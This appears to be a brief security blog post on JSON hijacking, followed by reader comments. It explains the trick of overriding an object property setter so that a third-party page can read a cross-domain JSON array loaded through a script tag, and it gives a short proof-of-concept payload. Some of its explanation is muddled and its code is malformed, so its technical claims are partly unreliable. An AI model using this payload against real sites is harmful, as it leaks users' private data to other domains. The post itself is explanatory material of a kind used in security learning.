Data leakage in JSON

A web application is sending data in this format:

{"t":1,"p":1,"r":1,"rows":[{"i":0,"c":["n","H, C","A","5","T","n"]}]}

this is a valid JSON, before moving on lets understand an important concept:

1. Javscript expression
2. javascript statement

javscript expressions are not executed by javascript parser, but statements are:

for ex:

<script>

{"t":1,"p":1,"r":1,"rows":[{"i":0,"c":["n","H, C","A","5","T","n"]}]}

</script>

this will not be executed, that is, objects won't be created. The above example is for a javascript expression.

But now when it is converted into a statement as given below:

<script>

[{"t":1,"p":1,"r":1,"rows":[{"i":0,"c":["n","H, C","A","5","T","n"]}]}]

</script>


this gets executed.

The way to exploit this is by declaring a setter for one of the objects, for ex. "t":

<script>
Object.prototype.__defineSetter__("t",function(obj){alert(1);for(var i in obj) {alert(i + '=' + obj[i]);} });
</script>
<script> defer="defer" src="http://XXX.XXX.XXX.X/main"/> // this points to the json
</script>


Until now there is no known way of exploiting a java expression based JSON.

Another restriction on JSON based exploitation is that not many browsers support setters (__defineSetter__).


Comments

Anonymous said…
its "JSON" not jason ... javascript object notation
Nilesh Kumar said…
@ Anonymous: Sorry, it was a typo! Thanks for noticing, I rectified it.
Anonymous said…
The vulnerability does not look like XSS, it is data leakage, the example shown extracts data from JS object from different domain. The title is misleading.
Anonymous said…
Are u going to change the heading?? it is not XSS???
Anonymous said…
i agree with above comment, author should correct or explains what he meaning by this.
Anonymous said…
The setter does not work with Firefox, is there any specific browser you tried this in? Can you provide any links where this function is better explained?

Popular posts from this blog

SQL Injection in search field

Nipper Download